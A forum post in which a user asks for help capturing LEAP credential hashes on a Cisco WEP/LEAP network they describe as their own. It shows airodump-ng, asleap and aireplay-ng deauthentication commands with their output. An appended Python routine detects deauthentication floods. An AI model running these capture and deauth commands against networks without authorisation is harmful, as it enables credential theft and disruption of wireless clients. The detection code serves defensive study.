Hey wireless specialists
It's my first post; I would be very grateful if someone could help me with my questions.
I'm learning about attacking a WEP LEAP authentication network.
Basically my network is a Cisco AP configured with WEP LEAP authenticating at a LDAP (integrated with my Domain Controller).
I have 3 different APs with the same configuration, to cover all our company space; all have the same BSSID, and it's not broadcast.
I was able to see my network with kismet or airodump-ng, and I can extract a few hashes (with asleap) from the .pcap file generated by airodump-ng. But my problem and question is: why can't I see and extract all the hashes from the clients authenticating? And why can't I force existing clients to de-authenticate and authenticate again so I can collect the hashes?
Well, my airodump-ng has output like:

airodump-ng -w ch06 --channel 06 --bssid 00:26:43:22:85:A2 wlan0

CH 6 ][ Elapsed: 1 min ][ 2009-12-15 13:33
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:26:43:22:85:A2 -27 7 273 208 0 6 54e. WEP WEP FWCHP
BSSID STATION PWR Rate Lost Packets Probes
00:26:43:22:85:A2 00:23:CB:82:AA:90 -17 2e-54 5 235
00:26:43:22:85:A2 00:1E:65:A2:49:7C -21 54e-54e 4 16
00:26:43:22:85:A2 00:13:E8:1C:A3:90 -32 54e-18e 0 13
00:26:43:22:85:A2 00:1B:77:2C:8F:FA -40 36e-48e 0 12
00:26:43:22:85:A2 00:13:02:C4:76:14 -42 36e-36e 0 23
00:26:43:22:85:A2 00:1C:BF:22:AC:92 -35 5e- 1e 28 192

As you can see, I was targeting a specific AP (one of my 3) that is working on channel 6 with BSSID 00:26:43:22:85:A2. The name of my SSID is FWCHP. Isn't it strange that none of the clients from my 6 active connections ever probe it?
Most of the time I never get hashes captured; if I look at the pcap files I just get:

MySystem:~# asleap -s -r ch06-01.cap
asleap 2.2 - actively recover LEAP/PPTP passwords.
Closing pcap ...

Before reading the .cap file with asleap I disconnected from the AP and authenticated again, and no hash was collected.
To make sure that I was doing everything right, I powered down the machine, started it again and authenticated again, and the same happened: no hashes were collected at my attacking machine, as demonstrated above. Any guess why?
If I keep it running for a longer time, sometimes I get:

MySystem:~# asleap -s -r ch06-01.cap
asleap 2.2 - actively recover LEAP/PPTP passwords.
LEAP Response, but does not match ID for previously observed request frame (136/154).
LEAP Response, but does not match ID for previously observed request frame (136/154).
Closing pcap ...

It's strange, since I was listening on the specific channel and the specific BSSID and waiting for more than 4 hours. Also, I reconnected several times and got no hashes. I don't understand why I'm not capturing them and why the tool is telling me that it is unable to match the ID. Any guess why it's happening?
My first try was to force clients (stations) to disconnect / de-authenticate, and consequently, when they connect again, I should get the hashes, right?
I did it like this:

MySystem:~# aireplay-ng -a 00:26:43:22:85:A2 -c 00:23:CB:82:AA:90 -e FWCHP --deauth 15 wlan0
13:42:49 Waiting for beacon frame (BSSID: 00:26:43:22:85:A2) on channel 6
13:42:51 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:52 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:53 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:54 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:55 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:56 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:57 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:58 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:59 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:00 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:01 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:03 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:43:04 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:05 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 3| 0 ACKs]
13:43:06 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]

But it never generated any hash. And worse, the client (station) 00:23:CB:82:AA:90 never got disconnected. The machine was next to me and I was watching it all the time, and it never lost connectivity.
Strange, isn't it? Any guess why?
I did this test, since I believe it may help:

MySystem:~# aireplay-ng -a 00:26:43:22:85:A2 -c 00:23:CB:82:AA:90 -e FWCHP --test wlan0
13:48:07 Waiting for beacon frame (BSSID: 00:26:43:22:85:A2) on channel 6
13:48:07 Trying broadcast probe requests...
13:48:09 No Answer...
13:48:09 Found 1 AP
13:48:09 Trying directed probe requests...
13:48:09 00:26:43:22:85:A2 - channel: 6 - 'FWCHP'
13:48:16 0/30: 0%

I would be very grateful if someone could give me hints to improve my attack and explain to me where I'm failing or doing things wrong.
I'm using BackTrack.
Thanks.
Regards,
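As an added illustration (not part of the original post): the aireplay-ng session above sends 64 directed Deauthentication frames per second at one station, which is exactly the burst pattern a wireless IDS flags. The Python below parses the 802.11 management header (type 0, subtype 12), counts deauth frames per (source, destination) pair over a sliding one-second window and raises one alert when the count passes a threshold; the window and threshold values are assumptions, and the frames it runs on are constructed in memory (reusing the BSSID and station address from the post), not a real capture.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame-control byte 0: type 0 (management) | subtype 12 (deauth)

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_deauth(frame):
    """Return (dst, src, bssid, reason) for an 802.11 Deauthentication frame, else None."""
    if len(frame) < 26:
        return None
    if (frame[0] & 0xFC) != DEAUTH_FC0:  # ignore the two protocol-version bits
        return None
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason = struct.unpack("<H", frame[24:26])[0]  # 2-byte little-endian reason code
    return mac(dst), mac(src), mac(bssid), reason

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """Alert once per (src, dst) pair whose deauth count inside `window` seconds exceeds `threshold`.
    `frames` is a list of (timestamp, raw_frame) pairs; window/threshold are assumed tuning values."""
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for ts, frame in frames:
        parsed = parse_deauth(frame)
        if parsed is None:
            continue
        dst, src, bssid, reason = parsed
        key = (src, dst)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": src, "dst": dst, "bssid": bssid,
                           "reason": reason, "count": len(q), "t": ts})
    return alerts

def build_deauth(dst, src, bssid, reason, seq):
    # Constructed sample frame: FC, duration, addr1-3, sequence control, then the reason code.
    hdr = bytes([DEAUTH_FC0, 0]) + b"\x3a\x01" + dst + src + bssid + struct.pack("<H", seq << 4)
    return hdr + struct.pack("<H", reason)

AP = bytes.fromhex("0026432285A2")     # BSSID from the post
STA = bytes.fromhex("0023CB82AA90")    # station from the post
OTHER = bytes.fromhex("001E65A2497C")  # another station from the post

def sample_capture():
    # Constructed input: one isolated deauth (reason 3, STA leaving) and a 64-frame burst (reason 7).
    frames = [(0.5, build_deauth(OTHER, AP, AP, 3, 1))]
    frames += [(10.0 + i * 0.01, build_deauth(STA, AP, AP, 7, 100 + i)) for i in range(64)]
    return frames
```

The single deauth at t=0.5 produces no alert; the burst trips the detector at its 11th frame, naming the spoofed source BSSID and the targeted station.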